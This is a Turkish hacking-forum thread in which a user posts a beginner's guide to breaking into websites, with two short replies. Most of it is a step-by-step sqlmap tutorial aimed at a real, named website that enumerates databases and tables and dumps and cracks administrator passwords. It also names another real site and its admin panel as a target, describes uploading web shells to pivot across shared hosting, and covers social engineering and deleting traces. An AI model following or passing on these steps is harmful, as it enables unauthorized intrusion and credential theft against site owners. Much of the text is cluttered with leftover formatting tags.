hackerlık derslerine başlamadan önce okuyun

Astrohack · 15 Tem 2015

MERHABA ARKADAŞLAR BUGÜN SİZLERE HACKER OLMADAN ÖNCE NELER YAPMANIZ GEREKTİĞİNİ ANLATCAM HADİ BAŞLAYALIM :mml:mml

ÖNCELİKLE BÜTÜN ARKADAŞLARIM HACKERLIĞA BAŞLAMADAN ÖNCE PROGRAMLAMA DİLLERİNİ ÖĞRENMELİ GİBİ ŞEYLER YAZIYORLAR BEN BUNA KARŞIYIM BANA KALIRSA HACKERLIĞA BAŞLAMADAN ÖNCE BUNLAR YAPILMALIDIR

1-BİLGİSAYARINIZI KORUMAYA ALIN NASIL MI?
ÖNCE BİLGİSAYARINIZI GİZLEYİN YANİ BAŞKA BİLGİSAYARLARIN SİZİ GÖRMEMESİ İÇİN SİZE BİRŞEYLER YAPILMAMASI İÇİN BİR PROGRAM İP DEĞİŞTİRME PROGRAMLARINDAN BİR TANESİNİ YÜKLEYİN ŞU AN AKLIMDA YOK O YÜZDEN ÖZÜR DİLERİM:RpS_smile:
BUNUN İÇİN SADECE İP GİZLEME PROGRAMLARINA GEREK YOK TABİ BİR ÇOK YOLU VAR MESELA BİLGİSAYARINIZA SANAL BİR MAKİNE KURABİLİRSİNİZ
GEREKEN PROGRAMLAR
-ORACLE VİRTUAL MACHİNE
-İSTEDİĞİNİZ BİR İŞLETİM SİSTEMİNİN İSO DOSYASI

NASIL YAPILDIĞINI GÖRMEK İÇİN LİNKE TIKLAMAN YETERLİ OLUR
https://youtu.be/LGUfa2HIx0E
BUNUNLA SANAL ORTAMDA BİR CASUS GİBİ DOLAŞABİLRİSİNİZ:q :q

SONRA BİLGİSAYARINIZA ANTİVİRÜS PROGRAMLARI ATIN ÖNERDİĞİM PROGRAMLAR AVİRA-COMODO-KASPERSKY-MALVERE VESAİRE VESİAİRE GİBİ PROGRAMLAR YÜKLEYİN AMA DİKKAT EDİN HERKESİN ÖNERDİĞİ PROGRAMI YÜKLEMEYİN BAZEN SİZE VİRÜSLÜ VEYA AZ ÇALIŞAN BİR PROGRAM ÖNEREBİLİR BOŞA VAKİT KAYBI

2-ŞİMDİ ASIL KONUYA GELELİM
BU KONUMUZDA NELER ÖĞRENMENİZ GEREKİR ONLARA BAKALIM AMA ÖNCEDEN BİR HACKERIN AĞZINDAN HACKERLIK DERSLERİNE BAKALIM

https://youtu.be/UdOpLZcSZJY

TABİ BUNU İZLEYİNCE BİZE ÇOK BİŞEY KALMADI AMA DEVAM EDELİM ARKADAŞLAR ŞİMDİ BU VİDEOLARI İZLEYİP UYGULADIKTAN SONRA HEMEN SİTE HACKLEYİM ŞUNU YAPAYIM BUNU YAPAYIM DEMEYİN ÖNCE HACK YAPACAĞINIZ SİTE VE BENZERİ İŞLERİNİZDE ÖNCE O SİTE HAKKINDA BİLGİ TOPLAYIN VE ARDINDAN NASIL HACKLEYECEĞİNİZİN PLANINI YAPIN
ARKADAŞLAR BU YAZI ALINTIDIR KİMDEN ALĞIMI TAM HATIRLAMIYORUM AMA WEBHACK HERALDE NEYSE KONUMUZA DÖNELİM

Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT |

[FONT=&quot]Merhaba arkadaşlar baslıktada belirttiğim gibi bugun sizlere elimden geldiğince hedef site nasıl hacklenir , site hacklemekteki [/FONT][FONT=&quot]mantık nedir [/FONT][FONT=&quot]? [/FONT][FONT=&quot], nasıl yapılır [/FONT][FONT=&quot]? [/FONT][FONT=&quot], neden yapılır [/FONT][FONT=&quot]? Gibi konuları anlatmaya calıştım videoda kullandığım tüm programları konunun en alt kısmında bulunan linkten indirebilirsiniz öncelikle videomun vede konumun amacını belirtmek isterimki bu konu tamamen Turkhackteam.Net/Org ailesi için hazırlanmıstır vede Tamamen güvenlik amacı ile derlenmiştir .. Selametle // [/FONT]

[FONT=&quot]~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~[/FONT]

[FONT=&quot]
Öncelikle basit bir anlatım yapmak istiyorum arkadaşlar videomuza geçmeden temel olarak aşamalarımızı vede plan ve işlem basamaklarımızı su sekilde sıralayabiliriz // [/FONT]

[FONT=&quot]~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~[/FONT]

[FONT=&quot]
Seneryo : Baslıkları :[/FONT]

----
| Veri ToplamaAşaması |
| Saldırı Hazırlık Aşaması |
| Saldırı Aşaması |
| Command Execution |
| Açıklar ve Exploiting |
| Sosyal Mühendislik & Phishing |
| İzleme ve Gizlenme |
| Sistemi Sahiplenme |
| İzleri Silme |
---
[FONT=&quot]Bu başlıklar üzerinden videoda anlatım yapılacaktır arkadaşlar bir sonraki videomda konu başlıkları daha da detayli incelenecektir bu video sadece bir introdur 1 saat 47 dakikaya sığdırabildim ... Ancak [/FONT]
[FONT=&quot]~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~[/FONT]

[FONT=&quot]
Merhabalar .. Bu videoda ... [/FONT]
[FONT=&quot]HedefSite HACK / MANTIĞI / KULLANILAN ARAÇLAR / VEDE HEDEF BİR SİTE HACK / [/FONT]
[FONT=&quot]GİBİ KONULAR ANLATILACAKTIR UMARIM YARARLI BİR VİDEO OLUR / TABİKİDE BANA GÖRE HEDEF SİTE GELEBİLECEĞİNİZ MİZ SON NOKTADIR OYUZDEN BURAYA KADAR GELİRKEN EN AZ BİR :d PHP BİLMENİN VEYA ACIKLAR HAKKINDA BİLGİ SAHİBİ OLMANIN COK FAZLA + SI VARDIR OYUZDEN BU VİDEODAN ÖNCE AÇIKLAR HAKKINDAKİ VİDEOLARI İZLEYİP BU NA GEÇMENİZ SİDDETLE TAVSİYE EDERİM BASİT OLARAK ANLATMAK GEREKİRSE MANTIĞI BİRAZDAN ANLATICAZ AMA ONDAN ÖNCE KULLANILAN MATERYALLER TOOLSLAR HAKKINDA BİLGİ VERECEĞİM [/FONT]
[FONT=&quot]~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~[/FONT]

Kullanılan Materyaller

[FONT=&quot][+][/FONT][FONT=&quot] HAVİJİ . [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] SSS ( SHADOW SECURİTY SCANER ) [/FONT]
[FONT=&quot][+] [/FONT][FONT=&quot]HACKİNG.PL [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] WEBCRUSİER WWS [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] ADMİNFİNDER[/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] Acunnetix [/FONT]
[FONT=&quot][+] [/FONT][FONT=&quot]DAHA COK PROGRAM KULLANDIKCA BURAYA EKLEYECEĞİM ŞİMDİLİK AKLIMA BUKADAR GELDİ
$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image001.gif$
[/FONT]

Hedef site işlem basamakları .. //

[FONT=&quot][+][/FONT][FONT=&quot] Dosya tarama [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] acık tarama [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] sosyal mühendislik [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] scripting injection PHP all bug system ( Script tarama ) [/FONT]

Hedef site bulduktan sonraki aşamalar

[FONT=&quot][+][/FONT][FONT=&quot] Sitedeki dosyaları bulmak Kullanılan program ( acunnetix veya tamper data ) [/FONT]
[FONT=&quot][+] [/FONT][FONT=&quot]sitedeki acıkları bulma ( sql , uplod , xss ) kullanılan program webcruiser ) veya ( acunnetix )[/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] hazırlık [/FONT]
[FONT=&quot][+][/FONT][FONT=&quot] saldırı[/FONT]
[FONT=&quot][+] [/FONT][FONT=&quot]izleri sil [/FONT]

Rapor :
[FONT=&quot]
Hedef site[/FONT][FONT=&quot] : http://www.kitefestpasirgudang.com/[/FONT]
[FONT=&quot]Acıklar taranıyor[/FONT][FONT=&quot] : olumlu : Sql [/FONT]
-------------------[FONT=&quot] > : [/FONT][FONT=&quot]olumsuz[/FONT][FONT=&quot] : xss , csrf [/FONT]
------------------- [FONT=&quot]> : [/FONT][FONT=&quot]kullanılabilir[/FONT][FONT=&quot] : sql [/FONT]
------------------- [FONT=&quot]> : [/FONT][FONT=&quot]kullanılamaz[/FONT][FONT=&quot] : xss , csrf [/FONT]
----------- [FONT=&quot]> [/FONT][FONT=&quot]ready [/FONT][FONT=&quot]: é 1 ! : Kullanıldı [/FONT]

[FONT=&quot]^ Gibi bir rapor hazırlanabilir ^[/FONT]

Durum analizi : ( Mutlaka yapılmalıdır )
----------- [FONT=&quot]> [/FONT][FONT=&quot]acıklı url[/FONT][FONT=&quot] : Pasir Gudang World Kite Festival[/FONT]
----------- [FONT=&quot]> [/FONT][FONT=&quot]admin paneli [/FONT][FONT=&quot]: http://www.kitefestpasirgudang.com/admin/[/FONT]

[FONT=&quot]~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~[/FONT]

[FONT=&quot]>Önemli Not < [/FONT]

[FONT=&quot]
Bu dökümanda verilen bilgiler tamamen eğitim amaçlı olup ,
burada yer alan bilgi veya araçlarla yapılan kötücül faaliyetlerden sunumu hazırlayan sorumlu tutulamaz![/FONT]
[FONT=&quot]Youtube video linki : Temel Saldırı Senaryosu WebHack | Hedef Site Hack Anlatım | THT | - YouTube
~[/FONT]-------------------------------------[FONT=&quot]~[/FONT]----------------------------------[FONT=&quot]~

[/FONT][FONT=&quot]
Hedef Site Hacking Anlatımı ( Videodan Bağımsızdır ) [/FONT]

[FONT=&quot]1-) Scriptler üzerinde oluşan açıklar ( Zafiyetler ) [/FONT][FONT=&quot]

[/FONT][FONT=&quot]+[/FONT][FONT=&quot]Bildiğiniz gibi scriptler çoğaldıkça bunlarla beraber açıkları da çoğalıyor. Örneğin; Bug Resin WordPressde buldugu XSRF gibi. Bizler bu gibi açıkları milw0rm gibi sitelerden takip etme şansına sahibiz. açık türlerine gelecek olursak farklı farklı sistemlerde farklı farklı dillerde bu tür zafiyettler gündem den gündeme mevcuttur en cok kullanılan sistem linux en cok acık bulunan dil ise php dir aslında en güvenli dil diye adını yaysa bile linux ve php birleşince inanılmaz sonuclar ortaya cıkıyor Scriptlere bakıcak olursak : [/FONT][FONT=&quot]

# Peki script üstünde ne gibi açıklar olabilir ?

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bildiğiniz gibi artık HTMLyi fazla kullanmıyorlar artık rehabet edilen dil ; ASP ve PHP. Hal bu olunca ASP ve PHP de açıklarda artıyor.

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Örneğin [/FONT][FONT=&quot]; ASP scriptte SQL İnjection yapılabilir. ( Admin k.adı ve şifresine erişilebilir)
PHP scriptte Remote File İnclude (RFİ) uygulanabilir. ( Servera rahatlıkla girmiş oluruz) ( Yani upload işlemleri )

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Tabi bunlar çoğalabilir LFİ - XSRF/CSRF - XST - XSS - XFS - BOF - CJ - PPTS vb. çoğaltmak münkün vede server tipi işletim sistemi değiştikce bu acık türleri filtrelenebilir veya arttırılabilir bu bahsettiklerimiz standartlaşmış acıklardır [/FONT][FONT=&quot]

[/FONT][FONT=&quot]2-) Server Üzerindeki Açıklar[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+[/FONT][FONT=&quot] Evet bir diğer yolumuz ise serverdir. Bildiğiniz üzere her site bir hosta dayanmaktadır.
Örneğin; www.hedef.com sitesi hedefhostingden host almıştır. Fakat serverinde hedef.comdan başka sitelerde olacaktır. http://ipnear.com/results.php?s=www....&submit=Lookup
[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bakıyoruz ki serverinde 175 other sites found with IP address: 216.222.193.52 175 site var.
[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Buda demek oluyor ki server kendinin değil , yani aslında işin kısacası bir sitede o siteye bağlı aynı hostu kullanan yüzlerce site olabilir bunun için siteye shell atmamız veya root olmamız lazım zaten shell atmadan root işlemleri olmaz

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image002.gif$

ftp bilgisi var ise olabilir ancak oda puttyle

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image001.gif$

[/FONT][FONT=&quot]

# Bu durumda neler yapabileceğiz ?

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Her hangibi bir sitenin açığını bulup shell upload edersek diğer sitelere geçiş yapabiliriz.

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Örneğin ; www.winmorkennels.com ( hedef.comun serverindeki bir site)

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bu siteye shell attığımız zaman ( Shell türü fark etmez; r57 - c99 - c100 - cgitelnet vb.) hedef.coma geçme şansımız vardır.

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Fakat bazen öyle serverlar oluyor ki shell attığınız dizini dahil göremiyoruz. Permler kapalı rootlayamıyoruz vs. vs.[/FONT][FONT=&quot]o gibi siteler için ise ürettilmiş bypass sheller vardır komut satırı acık olan shellerde ise dizinleri acık hale safe modu off hale getirebiliriz .
[/FONT][FONT=&quot]
[/FONT][FONT=&quot]3-) Port Üzerinden Saldırı[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bir diğer yolumuzda portlardır arkadaşlar.

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bildiğiniz gibi NMAP programı site üzerindeki açık portları tarar. Bizim işimize Yarayacak bir portlar ise,

www.milw0rm.com/port.php burada olacak.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Eğer uygun exploit(ler) bulunursa rahatlıkla saldırabiliriz.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]4-) Social Engineering[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bunu uzun uzadıya anlatmaya gerek yok arkadaşlar;

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Sizin hayal gücünüze kalmış bir meseledir. Sitenin yönetici ile itibata geçersiniz ve onu aklınızla yenip şifreleri alırsınız. hayal gücünüz ne kadar geniş olursa sitedeki bilgilere ulaşma sansınız da bir okadar artacaktır örneğin bir siteden whois cekip e mail bilgilerinden adreslere kadar her şeyi öğrenebilirsiniz bu edindiğiniz bilgiler doğrultusunda her türlü yol ile adminimizi kandırabilirz

[/FONT][FONT=&quot]+ [/FONT][FONT=&quot]Bu Şifre alma olayı Domain Hacke kadar gidebilir[/FONT]

EVET ARKADAŞLAR BUNLAR GİBİ KENDİNİZE TAKTİKLER HAZIRLAYIN VE HACKİNİZİ YAPIN BİR ÖRNEK VEREYİM BU VETERAN 7'DEN ALINTIDIR

---------------------------------------------------------------------------------------------------------------------------------------------

[FONT=&quot]SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden][/FONT][FONT=&quot]

[/FONT][FONT=&quot]Gerekli Dosyalar & Kurulum[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ Python 2.7 adlı setup ile Python kuruyoruz +
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +

[/FONT][FONT=&quot]Sorun Yaşayanlar Aşağıdaki Linklerden İndirsin[/FONT][FONT=&quot]

+ sqlmap: automatic SQL injection and database takeover tool +
+ https://www.python.org/download/releases/2.7/ +

[/FONT][FONT=&quot]
Dosyaları İndir [Yandex.Disk 22.6 MB]

Veteran SQLMap Helper(SQLMAP Kod Yardımcısı)

[/FONT][FONT=&quot]SQLMAP'ı CMD İle Çalıştırma[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:\" dizinine gelene kadar şu kodu yazalım ; [/FONT]

[FONT=&quot]Kod:[/FONT]

cd..

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image009.gif$

[/FONT][FONT=&quot]Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;[/FONT]

[FONT=&quot]Kod:[/FONT]

cd sqlmap

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image011.gif$

[/FONT][FONT=&quot]Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQL Açıklı Site Bulma[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "title.php?id=5" gibi.
[/FONT][FONT=&quot]
[/FONT][FONT=&quot]Örnek Site : [/FONT][FONT=&quot]Sea of Stories -Book

[/FONT][FONT=&quot]Yukarıda verdiğin örnek site linkine tıklayın açın linkin sonunda "title.php?id=5193" var manuel sql açığı bulacaksanız bu ıd değerinin sonuna örneğin " ' " tek tırnak koyun yani şu şekilde ; [/FONT]

[FONT=&quot]Kod:[/FONT]

http://www.seaofstories.com/title.php?id=5193'

[FONT=&quot]URL'nin sonuna tırnak koyup enter tuşuna basın farkedeceksinizki site bir hata veriyor[/FONT]

[FONT=&quot]Kod:[/FONT]

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/seaofstories/webapps/htdocs/title.php on line 34

[FONT=&quot]Bu sitede SQL İnjection açığı vardır.

Not : Dilerseniz verdiğim .rar dosyasındaki Safe3 adlı programla sitelerde SQL İnj. taraması yapabilirsiniz

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image013.gif$

Gördüğünüz gibi Safe3 ile tarattığımızda örnek sitemizde bir çok SQL İnjection açığı tespit ediyor.
[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQLMAP İle Veritabanını Çekme[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQL İnjection açıklı sitemizi bulduk şimdi SQLMAP ile bu sitenin veritabanı bilgilerini çekelim.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]1. Adım : Sitenin Veritabanı İsimlerini Çekme (Database)[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u http://hedefsite.com/sqlinjectionaciklibolum?id= --dbs

[FONT=&quot]Yani biz yukarıda bulduğumuz siteyi çekmek için şu şekilde yazacağız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u Sea of Stories -Book --dbs

[FONT=&quot]Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım [/FONT][FONT=&quot]

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image015.jpg$

[/FONT][FONT=&quot]ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz [/FONT][FONT=&quot]

[/FONT][FONT=&quot]Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi[/FONT][FONT=&quot]

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image019.jpg$

[/FONT][FONT=&quot]2. Adım : Veritabanı Tablolarını Çekme (Tables)[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u http://hedefurl.com Veritabanı_Adı --tables

[FONT=&quot]Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u Sea of Stories -Book seaofstories_app --tables

[FONT=&quot]Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir.[/FONT][FONT=&quot]

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image021.jpg$

[/FONT][FONT=&quot]İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]3. Adım : Veritabanı Tablolarınının Kolonlarını Çekme (Columns)[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı --columns

[FONT=&quot]Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators --columns

[FONT=&quot]Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.[/FONT][FONT=&quot]

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image023.gif$

[/FONT][FONT=&quot]Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]4. Adım : Kolonlardaki Verileri Çekme (Dump)[/FONT][FONT=&quot]

[/FONT][FONT=&quot]SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

[FONT=&quot]Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları[/FONT]

[FONT=&quot]Kod:[/FONT]

sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators -C password --dump

[FONT=&quot]Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız [/FONT]

[FONT=&quot]Kod:[/FONT]

Kod:sqlmap.py -u Sea of Stories -Book -D seaofstories_app -T Administrators -C username --dump

[FONT=&quot]

[/FONT][FONT=&quot]Paneli Bulma[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ Online panel tarayıcı :[/FONT][FONT=&quot] Fastest Online Admin Panel Finder [/FONT][FONT=&quot]+[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Bu tarz panel tarayıcılarla önce taratın , havijin tarayıcısı ile vs taratın eğer olmaz ise dosyada verdiğim "İntelli Tamper" adlı programla aşağıdaki gibi sitenin dosyalarını görebilirsiniz.[/FONT][FONT=&quot]

[/FONT]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image007.gif$

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.

[FONT=&quot]

$C:\Users\ASTROH~1\AppData\Local\Temp\msohtml1\01\clip_image027.gif$

[/FONT][FONT=&quot]İntelli Tamper ile site dosyalarını çektiğinizde manuel olarak paneli tespit edebilirsiniz dosyaları dizinleri inceleyerek.[/FONT][FONT=&quot]

[/FONT][FONT=&quot]Gerekebilecek Şeyler[/FONT][FONT=&quot]

[/FONT][FONT=&quot]+ Online panel tarayıcı :[/FONT][FONT=&quot] Fastest Online Admin Panel Finder [/FONT][FONT=&quot]+[/FONT][FONT=&quot]
[/FONT][FONT=&quot]+ İçinde SQL Dork Bulunan Kendi Yapımım Olan Dork Programı : [/FONT][FONT=&quot]Veteran Dork Studio 3

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[FONT=&quot]EĞER BURDAN BİŞEY A[FONT=&quot]NLAMADIYSANIZ LİNKE TIKLAYIN

http://www.turkhackteam.org/web-ser...n-hack-windows-cmd-uzerinden-veteran-7-a.html[/FONT][/FONT]

[/FONT]

PAYLAŞMIMIN ÇOK İŞE YARAMSA DİLEĞİYLE İYİ GÜNLER

[FONT=&quot]NOT=LÜTFEN BİR TEŞEKKÜRÜ ÇOK GÖRMEYİN:RpS_thumbsup: :RpS_thumbsup:
[/FONT]

Astrohack · 15 Tem 2015

Biraz karışık affetin

intel07 · 15 Tem 2015

Astrohack' Alıntı:
Biraz karışık affetin

Eline Sağlık Kardeşim Yararlı Bir Konu... :RpS_thumbsup:

02d3 · 15 Tem 2015

%75'i alıntı.
"MERHABA ARKADAŞLAR BUGÜN SİZLERE HACKER OLMADAN ÖNCE NELER YAPMANIZ GEREKTİĞİNİ ANLATCAM HADİ BAŞLAYALIM

ÖNCELİKLE BÜTÜN ARKADAŞLARIM HACKERLIĞA BAŞLAMADAN ÖNCE PROGRAMLAMA DİLLERİNİ ÖĞRENMELİ GİBİ ŞEYLER YAZIYORLAR BEN BUNA KARŞIYIM BANA KALIRSA HACKERLIĞA BAŞLAMADAN ÖNCE BUNLAR YAPILMALIDIR

1-BİLGİSAYARINIZI KORUMAYA ALIN NASIL MI?
ÖNCE BİLGİSAYARINIZI GİZLEYİN YANİ BAŞKA BİLGİSAYARLARIN SİZİ GÖRMEMESİ İÇİN SİZE BİRŞEYLER YAPILMAMASI İÇİN BİR PROGRAM İP DEĞİŞTİRME PROGRAMLARINDAN BİR TANESİNİ YÜKLEYİN ŞU AN AKLIMDA YOK O YÜZDEN ÖZÜR DİLERİM
BUNUN İÇİN SADECE İP GİZLEME PROGRAMLARINA GEREK YOK TABİ BİR ÇOK YOLU VAR MESELA BİLGİSAYARINIZA SANAL BİR MAKİNE KURABİLİRSİNİZ
GEREKEN PROGRAMLAR
-ORACLE VİRTUAL MACHİNE
-İSTEDİĞİNİZ BİR İŞLETİM SİSTEMİNİN İSO DOSYASI

NASIL YAPILDIĞINI GÖRMEK İÇİN LİNKE TIKLAMAN YETERLİ OLUR
https://youtu.be/LGUfa2HIx0E
BUNUNLA SANAL ORTAMDA BİR CASUS GİBİ DOLAŞABİLRİSİNİZ

SONRA BİLGİSAYARINIZA ANTİVİRÜS PROGRAMLARI ATIN ÖNERDİĞİM PROGRAMLAR AVİRA-COMODO-KASPERSKY-MALVERE VESAİRE VESİAİRE GİBİ PROGRAMLAR YÜKLEYİN AMA DİKKAT EDİN HERKESİN ÖNERDİĞİ PROGRAMI YÜKLEMEYİN BAZEN SİZE VİRÜSLÜ VEYA AZ ÇALIŞAN BİR PROGRAM ÖNEREBİLİR BOŞA VAKİT KAYBI"
Burası komple yanlış sanal makine virüslerden korur ve Windows ile Linux'u aynı anda kullanmanı sağlar.Bilgisayara aynı ağda değilse IP üzerinden birşey yapılamaz.Senin ki SK'lik.

hackerlık derslerine başlamadan önce okuyun

Astrohack

Üye

Astrohack

Üye

intel07

Üye

02d3

Kıdemli Üye

Sosyal medya sayfalarımız